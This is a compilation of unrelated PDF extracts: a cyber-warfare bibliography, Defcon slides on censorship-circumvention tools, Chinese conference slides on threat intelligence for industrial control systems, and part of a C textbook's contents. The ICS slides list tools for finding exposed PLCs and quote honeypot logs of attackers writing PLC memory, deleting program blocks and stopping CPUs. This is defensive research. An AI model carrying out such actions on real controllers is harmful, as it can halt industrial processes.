Lewis, J.A. (Dec 2002) “Assessing the Risks of Cyber Terrorism, Cyber War and Other Cyber Threats,” Center for Strategic and International Studies (CSIS). Lewis, J.A. (8 Dec 2008) “Securing Cyberspace for the 44th Presidency,” Center for Strategic and International Studies (CSIS). Lewis, J.A. (11 Mar 2010) “The Cyber War Has Not Begun,” Center for Strategic and International Studies (CSIS). Libicki, M.C. (2009) “Sub Rosa Cyber War,” The Virtual Battlefield: Perspectives on Cyber Warfare, Czosseck, C. & Geers, K. (Eds) (Amsterdam: IOS Press) 53-65. Lynn, W.J. (2010) “Defending a New Domain: The Pentagon’s Cyberstrategy,” Foreign Affairs 89(5) 97-108. The Manual of the Law of Armed Conflict (2004) Section 2.2 (Military Necessity), United Kingdom: Ministry of Defence (Oxford: OUP). 164 BIBLIOGRAPHY 164 BIBLIOGRAPHY Montalbano, E. (29 Sep 2010) “White House Sets IPv6 Transition Deadlines,” InformationWeek. Markoff, J. & Kramer, A.E. (13 Dec 2009a) “In Shift, U.S. Talks to Russia on Internet Security,” The New York Times. Markoff, J. & Kramer, A.E. (27 Jun 2009b) “U.S. and Russia Differ on a Treaty for Cyberspace,” The New York Times. Matthews, J. (19 Dec 2000) “SafeWeb Doubles Usage, Blocked by Saudis,” Internetnews: www. internetnews.com. Mayor, A. (2008) Greek Fire, Poison Arrows, and Scorpion Bombs: Biological & Chemical Warfare in the Ancient World (Overlook TP). McConnell, M. (28 Feb 2010) “Mike McConnell on how to win the cyber-war we’re losing,” Washington Post. Meier, O. (2007) “The Chemical Weapons Convention at 10: An Interview with OPCW Director- General Rogelio Pfirter,” Arms Control Today 37(3) 14. Meller, P. (27 May 2008) “European Commission Urges Rapid Adoption of IPv6,” IDG News Service. Meserve, J. (26 Sep 2007) “Sources: Staged cyber attack reveals vulnerability in power grid,” Cable News Network. Milhollin, G. & Lincy, V. (29 Sep 2009) “Lifting Iran’s Nuclear Veil,” The New York Times. Miller, E. K. (1989) “The computer revolution,” IEEE Potentials 8(2) 27-31. Mishra, S. (2003) “Network Centric Warfare in the Context of Operation Iraqi Freedom,” Strategic Analysis 27(4) 546-562. Moghaddam, N.B., Sahafzadeh, M., Alavijeh, A.S., Yousefdehi, H. & Hosseini, S.H. (2010) “Strategic Environment Analysis Using DEMATEL Method Through Systematic Approach: Case Study of an Energy Research Institute in Iran,” Management Science and Engineering 4(4) 95-105. “Monthly Malware Statistics: May 2009,” (2009) Kaspersky Lab: www.kaspersky.com. Montagne, R. “Reuters Retracts Altered Beirut Photo,” (8 Aug 2006) National Public Radio: www.npr.org. “Moore’s Law,” Intel Corporation, www.intel.com/technology/mooreslaw/. Morgenthau, H.J. (1948) Politics among nations: the struggle for power and peace (A. A. Knopf) 440. Mostyn, M.M. (2000) “The need for regulating anonymous remailers,” International Review of Law, Computers & Technology 14(1) 79. 165 Nakashima, E. & Mufson, S. (19 Jan 2008) “Hackers Have Attacked Foreign Utilities, CIA Analyst Says,” Washington Post. “NATO 2020: Assured Security, Dynamic Engagement: Analysis and Recommendations of the Group of Experts on a New Strategic Concept for NATO,” (17 May 2010) NATO Public Diplomacy Division: www.nato.int. Neumann, P.G. (1998) “Protecting the Infrastructures,” Communications of the ACM 41(1) 128. Newmark, J. (2001) “Chemical warfare agents: A primer,” Military Medicine 166(12) 9. Nizza, M. & Lyons, P.J. (10 July 2008) “In an Iranian Image, a Missile Too Many,” New York Times. “The North Atlantic Treaty,” (4 April 1949) Washington D.C., NATO website: www.nato.int/. Oberdorfer Nyberg, A. (2004) “Is All Speech Local? Balancing Conflicting Free Speech Principles on the Internet,” Georgetown Law Journal 92(3) 663-689. Oppy, G. & Dowe, D. (2008) “The Turing Test,” The Stanford Encyclopedia of Philosophy (SEP): http://plato.stanford.edu/. Orr, R. (2 Aug 2007) “Computer voting machines on trial,” Knight Ridder Tribune Business News. Orton, M. (14 Jan 2009) “Air Force remains committed to unmanned aircraft systems,” United States Air Force website: www.af.mil. Orwell, G. (2003) Nineteen Eighty-Four (London: Plume). “Overview by the US-CCU of the Cyber Campaign against Georgia in August of 2008,” (Aug 2009) U.S. Cyber Consequences Unit. Pavlyuchenko, F. (2009) “Belarus in the Context of European Cyber Security,” The Virtual Battlefield: Perspectives on Cyber Warfare, Czosseck, C. & Geers, K. (Eds) (Amsterdam: IOS Press) 156-162. Research paper written in Russian, translated to English by Kenneth Geers. Page, B. (11 Nov 2000) “Pro-Palestinian Hackers Threaten AT&T,” TechWeb News. Parks, R.C. & Duggan, D.P. (5-6 June, 2001) “Principles of Cyber-warfare,” Proceedings of the 2001 IEEE Workshop on Information Assurance and Security, United States Military Academy, West Point, NY. Pendall, D.W. (2004) “Effects-Based Operations and the Exercise of National Power,” Military Review 84(1) 20-31. Piscitello, D. (11 May 2010) “Conficker Summary and Review,” ICANN. Popoviciu, C., Levy-Abegnoli, E. & Grossetete, P. (2006) Deploying IPv6 Networks (Cisco Press) 248. 166 BIBLIOGRAPHY Preimesberger, C. (2006) “Plugging Holes,” eWeek 23(35) 22. “The President’s News Conference with President Boris Yeltsin of Russia in Helsinki,” (21 Mar 1997) The American Presidency Project, UC Santa Barbara: www.presidency.ucsb.edu. Ramaswamy, V.M. (Oct 2006) “Identity-Theft Toolkit,” The CPA Journal 76(10) 66. Rarick, C.A. (Winter 1996) “Ancient Chinese advice for modern business strategists,” S.A.M. Advanced Management Journal 61(1) 42. “Regime steps up censorship and online disruption to block protests,” (15 February 2011) Reporters Without Borders. “Remarks by the President on Securing our Nation’s Cyber Infrastructure,” (29 May 2009) The White House: Office of the Press Secretary: www.whitehouse.gov. “Renumbering the net,” (10 Mar 2011) The Economist. Rona, T.P. (1976) Weapon Systems and Information War (WA: The Boeing Corporation). Rose, A. (25 Oct 1999) “China studies the art of cyber-war,” National Post. Rowland, J.B. (2002) “The role of automated detection in reducing cyber fraud,” The Journal of Equipment Lease Financing 20(1) 2. Sartori, L. (1983) “The weapons tutorial-Part five: When the bomb falls,” Bulletin of the Atomic Scientists 39(6) 40-47. Saltzer, J.H. & Schroeder, M.D. (1975) “The protection of information in computer systems,” Proceedings of the IEEE 63(9) 1278-1308. “Saudi Arabia to double number of banned sites,” (01 May 2001) The China Post. “Saudi Arabian Response and Reasoning,” Virginia Tech Department of Computer Science Digital Library, Computer Science 3604: Professionalism in Computing. Sawyer, R.D. (1994) Sun Tzu: Art of War (Oxford: Westview Press). Saydjari, O.S. (2004) “Cyber Defense: Art to Science,” Communications of the ACM 47(3) 53-57. Shimeall, T., Williams, P. & Dunlevy, C. (Winter 2001/2002) “Countering cyber war,” NATO Review 16-18. Shultz, G.P., Perry, W.J., Kissinger, H.A., & Nunn, S. (4 Jan 2007) “A World Free of Nuclear Weapons,” The Wall Street Journal. Skoudis, E. (2006) Counter Hack Reloaded: a Step-By-Step Guide to Computer Attacks and Effective Defenses (NJ: Prentice Hall) 1. “Smurf IP Denial-of-Service Attacks,” (1998) CERT Advisory CA-1998-01. SNORT Users Manual 2.9.0, (6 Jan 2011) The Snort Project. 167 “Spain, a week on: An election bombshell,” (18 Mar 2004) The Economist. Stoil, R.A. & Goldstein, J. (28 Jun 2006) “One if by Land, Two if by Modem,” The Jerusalem Post. Stöcker, C., Neumann, C. & Dörting, T. (18 Jun 2009) “Iran’s Twitter Revolution: Ahmadinejad’s Fear of the Internet,” Spiegel. “Stuxnet may be the work of state-backed hackers,” (Sep 2010) Network Security, Mansfield- Devine, S. (Ed.) 1-2. Sun Tzu. (1994) Sun Tzu on the Art of War: The Oldest Military Treatise in the World, Project Gutenberg eBook (translated in 1910 by Giles, L.) www.gutenberg.org/etext/132. Thomas, T.L. (2002) “Information Warfare in the Second (1999-Present) Chechen War: Motivator for Military Reform?” Fort Leavenworth: Foreign Military Studies Office and (2003) in Chapter 11 of Russian Military Reform 1992-2002, Frank Cass Publishers. “Tracking GhostNet: Investigating a Cyber Espionage Network,” (29 Mar 2009) Information Warfare Monitor. Tran, M. (28 Sep 2007) “Internet access cut off in Burma,” The Guardian. United States Strategic Bombing Survey: Summary Report (European War), (30 Sep 1945) United States Government Printing Office, Washington, D.C. “‘USA Today’ Website Hacked; Pranksters Mock Bush, Christianity,” (11 Jul 2002) Drudge Report. Usher, S. (17 March 2006) “Belarus stifles critical media,” BBC News. Van Creveld, M. (1987) Command in War (MA: Harvard UP). Van Riper, P.K. (2006) Planning for and Applying Military Force: an Examination of Terms (U.S. Army War College: Strategic Studies Institute). Verton, D. (2002) The Hacker Diaries: Confessions of Teenage Hackers (NY: McGraw-Hill/ Osborne). Verton, D. (2003) “Black ice,” Computerworld 37(32) 35. Verton, D. (4 Apr 1999) “Serbs Launch Cyberattack on NATO,” Federal Computer Week. Voeux, C. (2 Nov 2006) “Going online in Cuba – Internet under surveillance.” Cuba: News from and about Cuba: http://cuba.blogspot.com. Wagner, D. (9 May 2010) “White House sees no cyber attack on Wall Street,” Associated Press. Wagstaff, J. (30 Apr 2001) “The Internet could be the site of the next China-U.S. standoff,” The Wall Street Journal. 168 BIBLIOGRAPHY Waterman, S. (10 Mar 2008) “DHS stages cyberwar exercise,” UPI. Weaver, N., Paxson, V., Staniford, S. & Cunningham, R. (27 Oct 2003) “A taxonomy of computer worms,” Proceedings of the 2003 ACM Workshop on Rapid Malcode (WORM’03), Washington, DC, 11-18. Weisman, R. (13 June 2001) “California Power Grid Hack Underscores Threat to U.S.” Newsfactor. Whitaker, B. (26 Feb 2001) “Losing the Saudi cyberwar,” Guardian. Whitaker, B. (11 May 2000) “Saudis claim victory in war for control of web,” Guardian. “Yugoslavia: Serb Hackers Reportedly Disrupt U.S. Military Computer,” (28 Mar 1999) Bosnian Serb News Agency SRNA (reported by BBC Monitoring Service, 30 Mar 1999). 169
pdf
Tools for Censorship Resistance Rachel Greenstadt greenie@eecs.harvard.edu Defcon XII July 29, 2004 http://www.eecs.harvard.edu/ greenie/defcon-slides.pdf Tools for Censorship Resistance – p.1/37 Overview Approaches to Censorship Circumvention methods Case study: China Censorship in a “free” society the LOCKSS project Unobservability Tools for Censorship Resistance – p.2/37 A Taxonomy of Censorship Generalized Blocking Blocking publishers/servers Blocking receivers/clients Modifying content for censorship "Arms race" solutions okay Surveillance/Chilling Effects Relies on accountability/punishment Effective censors use multiple techniques Tools for Censorship Resistance – p.3/37 Blocking Publishers Figure 1: Bonsai kitten picture from bonsaikitten.com Hardest form of censorship to do (spam) Offensive material for- bidden by govt/ISP/DOS attackers Tools for Censorship Resistance – p.4/37 Circumventing Publisher Blocking Find someone who will make material available More permitting ISP Writable web pages (blogs, etc) Outside jurisdictions Anonymity services Can help if publisher blocking is combined with surveillance Hidden servers may prove useful for avoiding DOS attacks Current systems probably too fragile Tools for Censorship Resistance – p.5/37 Blocking Receivers If the blocking authority has control over some, but not all, internet users Government firewalls at routers Corporate firewalls Nannyware in schools/libraries Tools for Censorship Resistance – p.6/37 Blocking Approaches 1 Web Site Blocked The website you were trying to access was deemed inappropriate by the Authorities. If you feel that this particular web site should not have been blocked per our policy, you may ask that the web site be removed from the blocked list by going to the following website. If you have any questions, contact us at internetpolice@authority.net. Tools for Censorship Resistance – p.7/37 Blocking Approaches 2 Tools for Censorship Resistance – p.8/37 Blocking Techniques Block open or closed? Drop packets at gateway based on IP address DNS redirection Filter based on keywords Filter based on images ("Finding Naked People") Block loophole servers Proxies/anonymizers/translators/google cache/wayback machine/etc Tools for Censorship Resistance – p.9/37 Overview Approaches to Censorship Circumvention methods Case study: China Censorship in a “free” society the LOCKSS project Unobservability Tools for Censorship Resistance – p.10/37 Circumvention Methods Proxies Tunnels Mirrors Email (spam) P2P systems to make proxies available Safeweb/Triangle-Boy, Six/Four, Peek-a-booty, Infranet Tools for Censorship Resistance – p.11/37 Publicizing the circumvention system 1. You don’t: used by small set of people, communicate out of band 2. Use something to communicate that they won’t or can’t block This may be harder than you think 3. Closed group: no one sees the whole pattern Infranet: keyspace-hopping (client puzzles) TU Dresden: captchas Won’t work against a resource rich adversary Tools for Censorship Resistance – p.12/37 Stego in Circumvention Systems Can make proxy servers more difficult to detect and block, clients have plausible deniability Infranet (MIT NMS)—embed requests for content in the sequence of http requests, embed content itself steganographically in images Camera Shy (Hacktivismo)—uses lsb steganography. Automatically scans and parses web pages for applications Tools for Censorship Resistance – p.13/37 Tools Peacefire Circumventor: http://www.peacefire.org Psiphon: http://www.citizenlab.org/ DIT: http://www.dit-inc.us/ Anonymizer: http://www.anonymizer.com/ TOR: http://freehaven.net/tor/ Hacktivismo: http://www.hacktivismo.com/ Freenet-china: http://www.freenet-china.org/ Tools for Censorship Resistance – p.14/37 Overview Approaches to Censorship Circumvention methods Case study: China Censorship in a “free” society the LOCKSS project Unobservability Tools for Censorship Resistance – p.15/37 Internet Censorship in China Use publisher/receiver blocking, surveillance Makes evident how much of “cyberspace” is tied to national borders and how much isn’t Opaque system, closed blocking Tools for Censorship Resistance – p.16/37 Goals Block dissident websites and pornography Belief that access to the Internet would foment change/unrest Also—Internet used as coordination tool for dissidents 3 main dissident groups (Rand) Falun Gong Chinese Democratic Party Tibetan/Taiwanese sites Also block news, health, education, gov’t, religion Tools for Censorship Resistance – p.17/37 PRC Resources Control of routers inside China Internet access in country through cooperative ISPs Sophisticated network and Internet cafe surveillance approx 30,000+ employees to find sites to filter (Big Mamas/volunteers) Ability to arrest/detain/interrogate suspicious individuals Tools for Censorship Resistance – p.18/37 Evolution of Chinese Censorship Witnessing the “arms race” 1995 Internet commerically available in China 1996 “Great Firewall of China” 1997 Regulations place liability for Internet use on ISPs 1999 Foreign dissident sites DOS’ed 2000 Golden Shield begins, Security China 2000 2001 Safeweb/Triangle Boy blocked 2001 Capital crime to “provide state secrets” over Internet 2002 Pledge of Self-Discipline for Chinese Internet Industry 2002 DNS hijacking Tools for Censorship Resistance – p.19/37 Evolution of Chinese Censorship 2002 Attempt to block google -> keyword blocking 2002 More fi ne grained blocking (CNN, blogspot) 2002 Internet cafe fi re, PRC closes cafes 2002 Cafes required to install surveillance software 2002 Downtime punishment 2004 est. 87 million Internet users in China 2004 PRC monitoring SMS text messages Tools for Censorship Resistance – p.20/37 Sad Story of Safeweb Set up a proxy service, got blocked Set a P2P network of proxies, they got blocked Almost immediately With their resources, China can discover the peers and block them, even with rate limiting measures You try getting a P2P network up and running this way Involuntary servers? (In a windows app?) On a safe port—blocked A gazillon IIS servers, there’s a good idea... Tools for Censorship Resistance – p.21/37 But they wouldn’t block X... Only a few sites they unblocked (google, blogspot) Even these they do selective blocking And random P2P servers aren’t likely to be useful to them for anything Don’t expect companies to help you We’re selling them surveillance tech They’ve signed self-discipline pledges too Tools for Censorship Resistance – p.22/37 VIP Reference Dissident email newsletter (http://come.to/dck) Most successful widespread circumvention Spam’s a hard problem Sent to prominent party members, random Chinese, and dissidents Not without repercussions: Lin Hai sentenced to 2 years in prison for providing 30,000 email addresses to “overseas hostile publications” Tools for Censorship Resistance – p.23/37 Implications Outside China Traffic routed through China subject to filtering Root nameserver in China could cause people outside China to be subject to DNS hijacking Common carrier status? Tools for Censorship Resistance – p.24/37 References on China “Empirical Analysis of Internet Filtering in China,” Zittrain/Edelman, Harvard Berkman Center Zittrain/Edelman, Harvard Berkman Center http://cyber.law.harvard.edu/filtering/china/ “You’ve Got Dissent! Chinese Dissident Use of the Internet and Beijing’s Counter-Strategies” Chase/Mulvenon, RAND http://www.rand.org/publications/MR/MR1543/ Tools for Censorship Resistance – p.25/37 Overview Approaches to Censorship Circumvention methods Case study: China Censorship in a “free” society the LOCKSS project Unobservability Tools for Censorship Resistance – p.26/37 Document distortion or removal Form of blocking, previously available items are changed or disappear Concern in U.S. (talk at PORTIA) Can be mitigated with digital signatures BUT—Often self-censorship Tools for Censorship Resistance – p.27/37 Example: Time Magazine This article was removed from Time’s online website Also excised from the Table of Contents From memoryhole.org Tools for Censorship Resistance – p.28/37 LOCKSS: Lots of Copies Keep Stuff Safe Libraries help prevent document distortion by preserving documents in many locations LOCKSS is a P2P system to help libraries Archive documents and avoid bit rot Maintain consensus about which document is correct Some online sources doing similar things (wayback machine, memoryhole, cryptome, google cache) Tools for Censorship Resistance – p.29/37 Overview Approaches to Censorship Circumvention methods Case study: China Censorship in a “free” society the LOCKSS project Unobservability Tools for Censorship Resistance – p.30/37 Unobservability as Censorship Resistance Unobservability hides both the content and the fact that covert communication is taking place Examples: steganography, covert channels Can help circumvent surveillance And blocking (can’t block what you don’t know is there) Dissident two-way communication Tools for Censorship Resistance – p.31/37 Limitations of Encryption It may be forbidden, or bring unwelcome suspicion Censoring authority may have the ability to gain keys (Britain) Many systems built to avoid this problem Requires some degree of coordination(keys)/technical sophistication Tools for Censorship Resistance – p.32/37 Properties for Unobservable Systems Undetectability Plausible (legitimate cover) Encode the message to match channel statistically Robustness Message survive natural/malicious lossiness Indispensable Tools for Censorship Resistance – p.33/37 Limitations of Unobservability Hard to have security guarantees about detectability Many ’unobservable’ approaches are detectable—security through obscurity Especially true if you are worried about the channel being blocked Tools for Censorship Resistance – p.34/37 Pitfalls of Randomness Images from Westfeld’s attacks on steganographic systems Embedding cryptographic output in nonrandom sources is obvious In general, bits are not random I made this mistake with TCP timestamps Tools for Censorship Resistance – p.35/37 Image Steganography LSB steganography is detectable. Easily. Increasingly good blind jpeg steg detection (Fridrich) Certainly an arms race Robustness? Image choice steganography Very low bandwidth But robust, hard to detect Fotoblogs... Tools for Censorship Resistance – p.36/37 Conclusions Circumvention is easy to do on small scale, hard to do on large scale Hardest problem is distributing circumvention systems, without having them blocked Arms race double edged Can cause working circumvention methods to get blocked Make circumventor pay higher price for control With surveillance, need to make sure users aware of risks Tools for Censorship Resistance – p.37/37
pdf
感知·诱捕·情报·协作 [ Kimon@灯塔实验室 ] ⺴络空间⼯控系统威胁情报 关于我们 | [ Kimon@灯塔实验室 ] 王启蒙 Kimon 电话:18500851413 邮箱:kimon@plcscan.org 微信:ameng929 基础威胁情报 VS. 高级威胁情报 信息收集方式 VS. 威胁捕获技术 被动威胁感知架构体系 从威胁数据到威胁情报 [ 灯塔实验室@KCon ] Part. 01 基础威胁情报 VS. ⾼级威胁情报 基础威胁情报 VS. ⾼级威胁情报| [灯塔实验室@KCon ] 国外针对网络空间的情报收集计划 SHINE计划——Project Shodan Intelligence Extraction X-Plane、Treasure Map、NCR 绘制网络空间地图,构建上帝视角感知能力 基础威胁情报 VS. ⾼级威胁情报| [灯塔实验室@KCon ] 基础威胁情报(数据情报) 流量/文件 BGP/AS/路由/Whois/指纹 Passive DNS/信誉数据 战术威胁情报(数据关联&分析) 机读文件(IoC/TTP) 情报落地、协作联动 战略威胁情报(价值&决策) 可读报告 意图分析、感知预测、决策支撑 基础威胁情报 VS. ⾼级威胁情报| [灯塔实验室@KCon ] 数据情报 数据情报是威胁情报的基础 数据情报需要进一步融合、关联、分析 战略情报将关系上层决策,不容有失 基础威胁情报 VS. ⾼级威胁情报| [灯塔实验室@KCon ] 基础威胁情报 VS. ⾼级威胁情报| [灯塔实验室@KCon ] 工控系统威胁情报 国家关键信息基础设施 针对能源、关键制造等行业的威胁加剧 Stuxnet/Duqu/Flame BlackEnergy 针对SCADA系统的威胁加剧 远程可控制SCADA、PLC 遍布互联网的工控资产 针对工控专有协议的探测 针对工控设施的威胁行为更值得研究 全球网络空间“底线” 具备上层战略特征 https://apt.securelist.com Part. 02 信息收集⽅式VS. 威胁诱捕技术 开放的互联网设备搜索平台 Shodan shodan.io Censys censys.io ZoomEye zoomeye.org ICSfind icsfind.org IVRE ivre.rocks Rapid7 scan.io 开源扫描器框架 nmap nmap.org zmap zmap.io masscan github.com/robertdavidgraham/masscan 基于指纹识别平台的工控设备信息收集方式 《ICS/SCADA/PLC Google/Shodanhq Cheat Sheet》 http://scadastrangelove.org/ 《Internet connected ICS/SCADA/PLC Cheat Sheet》 http://www.scadaexposure.com/ 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 利用标准且公开/私有的工控协议对工控系统及设备进行识别 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 利用传统服务特征对工控系统及设备进行识别 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 识别工具列举 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] https://scadahacker.com/resources/msf-scada.html 信息情报收集不只是“扫描” Kill Chain至关重要的第一步 踩点、组装、投送、攻击、植入、控制、收割 由点至面 一个暴漏的工控服务 一个正在运转工业生产网络 40亿IPv4空间针对工控设备进行定位 针对工控网络新型渗透模式 PLC Blaster 网络空间设备搜索平台 时间轴设备信息态势 提供互联网“靶标” 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 威胁捕获方式 传统安全防御设备 针对工控系统的蜜罐 思科PLC蜜罐 Digitalbond 趋势科技 Conpot 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 工控蜜罐存在的问题 易被甄别 针对工控协议的仿真交互低 配置繁琐容易留下疏漏 缺少针对工控业务的仿真 难管理 蜜罐部署繁琐 不具备分布式管理机制 难分析 数据日志机制陈旧 数据量增多难以分析 不具备结合威胁情报的能力 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 主动监测国外蜜罐部署情况 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 通过Shodan搜索国外蜜罐案例 Shodan API 信息收集⽅式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 国外工控组合蜜罐案例 Part. 03 被动威胁感知技术 被动威胁感知技术| [灯塔实验室@KCon ] 工控设备主动指纹信息 S7comm通信流程 TCP三次握手建立通讯TCP连接 ISO_TP连接建立 S7协议连接请求、应答建立连接 实现S7协议读取数据 通过模拟S7comm协议可获取设备信息 Module: 6ES7 151-8AB01-0AB0 Basic Hardware: 6ES7 151-8AB01-0AB0 Version: 3.2.3 System Name: SIMATIC 300(1) Module Type: AN12CPU Serial Number: S C-B8TH91812011 Copyright: Original Siemens Equipment 被动威胁感知技术| [灯塔实验室@KCon ] 工控设备被动指纹信息 《揭秘VxWorks—直击物联网安全罩门》 被动威胁感知技术| [灯塔实验室@KCon ] 工控设备被动指纹信息 被动威胁感知技术| [灯塔实验室@KCon ] 工控设备被动指纹信息 通过modbus协议获取设备项目文件信息 Redpoint nse脚本指纹 debug模式 被动威胁感知技术| [灯塔实验室@KCon ] 被动威胁感知平台架构 IP 被动威胁感知技术| [灯塔实验室@KCon ] 交互行为模式自识别 被动威胁感知技术| [灯塔实验室@KCon ] 自识别后人工分析 提取常见扫描脚本/工具的交互模式 Nmap Script(Redpoint) Msf module Git中的常见针对协议的脚本 提取扫描者、扫描器的行为模式 Shodan Censys Rapid7 Part. 04 从威胁数据到威胁情报 从威胁数据到威胁情报| [灯塔实验室@KCon ] 真实的捕获案例 #向DB1数据区写入数据 2016-02-10 15:25:44 [209.133.66.214] WriteUrequest,UAreaU:UDB1,UStartU:U0,USizeU:U452U-->UOK 2016-02-10U15:25:45U[209.133.66.214]UWriteUrequest,UAreaU:UDB1,UStartU:U452,USizeU:U60U-->UOK #向DB1、2、3数据区写入数据 2016-02-22U06:54:19U[93.115.95.202]UWriteUrequest,UAreaU:UDB1,UStartU:U0,USizeU:U16U-->UOK 2016-02-22U06:54:19U[93.115.95.202]UWriteUrequest,UAreaU:UDB2,UStartU:U0,USizeU:U16U-->UOK 2016-02-22U06:54:19U[93.115.95.202]UWriteUrequest,UAreaU:UDB3,UStartU:U0,USizeU:U16U-->UOK #删除CPU程序块 2016-02-22 06:54:43 [93.115.95.202] CPUUControlUrequestU:UBlockUInsertUorUDeleteU-->UOK #冷启动PLCUCPU 2016-02-22U06:58:09U[37.48.80.101]UCPUUControlUrequestU:UWarmUSTARTU-->UOK #停止PLCUCPU 2016-02-22U06:58:21U[37.48.80.101]UCPUUControlUrequestU:USTOPU-->UOK #修改PLC系统时间 2016-02-22 07:03:02 [37.48.80.101] SystemUclockUwriteUrequested • 攻击动作 – 写内存数据 – 操作CPU状态 – 修改系统时钟 – 删除系统程序 • 攻击影响 – 数据异常 – 程序停止运行 – 系统时间异常 – 系统运行故障 从威胁数据到威胁情报| [灯塔实验室@KCon ] 对PLC-Blaster的监测 S7-300 FB65 "TCON" FB63 "TSEND" FB64 "TRCV" S7-1200 TCON TSEND/TUSEND TRCV/TURCV CP FC5 "AG_SEND" FC6 "AG_RECV" 从威胁数据到威胁情报| [灯塔实验室@KCon ] 针对HMI的溢出攻击 从威胁数据到威胁情报| [灯塔实验室@KCon ] 针对HMI的web攻击 从威胁数据到威胁情报| [灯塔实验室@KCon ] 针对HMI的工控业务攻击 从威胁数据到威胁情报| [灯塔实验室@KCon ] Shodan组织战术威胁情报 从威胁数据到威胁情报| [灯塔实验室@KCon ] Shodan组织战术威胁情报 从威胁数据到威胁情报| [灯塔实验室@KCon ] Shodan组织战术威胁情报 从威胁数据到威胁情报| [灯塔实验室@KCon ] Shodan组织战术威胁情报 从威胁数据到威胁情报| [灯塔实验室@KCon ] Shodan组织战术威胁情报 从威胁数据到威胁情报| [灯塔实验室@KCon ] Shodan组织战略威胁情报 http://plcscan.org/blog/2016/06/ics-security-research-report-2016-05/ 从威胁数据到威胁情报| [灯塔实验室@KCon ] Shodan组织战略威胁情报 IP RDNS S7 102 Modbus 502 Ethenet/IP 44818 82.221.105.6 census10 169 20130821 20130827 20141025 71.6.167.142 census9 232 20140720 20140526 20140504 71.6.135.131 census7 234 20140508 20140509 20140510 66.240.236.119 census6 233 20140602 20140706 20140430 71.6.158.166 ninja. census 111 —— —— 20160520 82.221.105.7 census11 167 20140206 20140206 20140207 85.25.43.94 rim.census 192 20150122 —— 20141016 71.6.165.200 census12 236 20140222 20140227 20140212 198.20.99.130 census4 92 20140516 20140630 66.240.192.138 census8 237 20140226 20140225 20140226 71.6.146.185 Inspire.census 67 —— 20160414 66.240.219.146 burger.census 107 —— —— 20160520 198.20.69.98 border.census 215 20141007 20141104 20140604 198.20.70.114 census3 224 20140512 20140518 20140603 188.138.1.218 unknown 93 20150811 20150627 20160524 [ 灯塔实验室@KCon ] T H A N K S [ 灯塔实验室@KCon ]
pdf
目 录 封面 扉页 版权 内容提要 作者简介 前言 第1章 初识C语言 1.1 C语言的起源 1.2 选择C语言的理由 1.2.1 设计特性 1.2.2 高效性 1.2.3 可移植性 1.2.4 强大而灵活 1.2.5 面向程序员 1.2.6 缺点 1.3 C语言的应用范围 1.4 计算机能做什么 1.5 高级计算机语言和编译器 1.6 语言标准 1.6.1 第1个ANSI/ISO C标准 1.6.2 C99标准 1.6.3 C11标准 1.7 使用C语言的7个步骤 1.7.1 第1步:定义程序的目标 1.7.2 第2步:设计程序 1.7.3 第3步:编写代码 1.7.4 第4步:编译 1.7.5 第5步:运行程序 1.7.6 第6步:测试和调试程序 1.7.7 第7步:维护和修改代码 1.7.8 说明 2 1.8 编程机制 1.8.1 目标代码文件、可执行文件和库 1.8.2 UNIX系统 1.8.3 GNU编译器集合和LLVM项目 1.8.4 Linux系统 1.8.5 PC的命令行编译器 1.8.6 集成开发环境(Windows) 1.8.7 Windows/Linux 1.8.8 Macintosh中的C 1.9 本书的组织结构 1.10 本书的约定 1.10.1 字体 1.10.2 程序输出 1.10.3 特殊元素 1.11 本章小结 1.12 复习题 1.13 编程练习 第2章 C语言概述 2.1 简单的C程序示例 2.2 示例解释 2.2.1 第1遍:快速概要 2.2.2 第2遍:程序细节 2.3 简单程序的结构 2.4 提高程序可读性的技巧 2.5 进一步使用C 2.5.1 程序说明 2.5.2 多条声明 2.5.3 乘法 2.5.4 打印多个值 2.6 多个函数 2.7 调试程序 2.7.1 语法错误 2.7.2 语义错误 3 2.7.3 程序状态 2.8 关键字和保留标识符 2.9 关键概念 2.10 本章小结 2.11 复习题 2.12 编程练习 第3章 数据和C 3.1 示例程序 3.2 变量与常量数据 3.3 数据:数据类型关键字 3.3.1 整数和浮点数 3.3.2 整数 3.3.3 浮点数 3.4 C语言基本数据类型 3.4.1 int类型 3.4.2 其他整数类型 3.4.3 使用字符:char类型 3.4.4 _Bool类型 3.4.5 可移植类型:stdint.h和inttypes.h 3.4.6 float、double和long double 3.4.7 复数和虚数类型 3.4.8 其他类型 3.4.9 类型大小 3.5 使用数据类型 3.6 参数和陷阱 3.7 转义序列示例 3.7.1 程序运行情况 3.7.2 刷新输出 3.8 关键概念 3.9 本章小结 3.10 复习题 3.11 编程练习 第4章 字符串和格式化输入/输出 4 4.1 前导程序 4.2 字符串简介 4.2.1 char类型数组和null字符 4.2.2 使用字符串 4.2.3 strlen()函数 4.3 常量和C预处理器 4.3.1 const限定符 4.3.2 明示常量 4.4 printf()和scanf() 4.4.1 printf()函数 4.4.2 使用printf() 4.4.3 printf()的转换说明修饰符 4.4.4 转换说明的意义 4.4.5 使用scanf() 4.4.6 printf()和scanf()的*修饰符 4.4.7 printf()的用法提示 4.5 关键概念 4.6 本章小结 4.7 复习题 4.8 编程练习 第5章 运算符、表达式和语句 5.1 循环简介 5.2 基本运算符 5.2.1 赋值运算符:= 5.2.2 加法运算符:+ 5.2.3 减法运算符:- 5.2.4 符号运算符:-和+ 5.2.5 乘法运算符:* 5.2.6 除法运算符:/ 5.2.7 运算符优先级 5.2.8 优先级和求值顺序 5.3 其他运算符 5.3.1 sizeof运算符和size_t类型 5 5.3.2 求模运算符:% 5.3.3 递增运算符:++ 5.3.4 递减运算符:-- 5.3.5 优先级 5.3.6 不要自作聪明 5.4 表达式和语句 5.4.1 表达式 5.4.2 语句 5.4.3 复合语句(块) 5.5 类型转换 5.6 带参数的函数 5.7 示例程序 5.8 关键概念 5.9 本章小结 5.10 复习题 5.11 编程练习 第6章 C控制语句:循环 6.1 再探while循环 6.1.1 程序注释 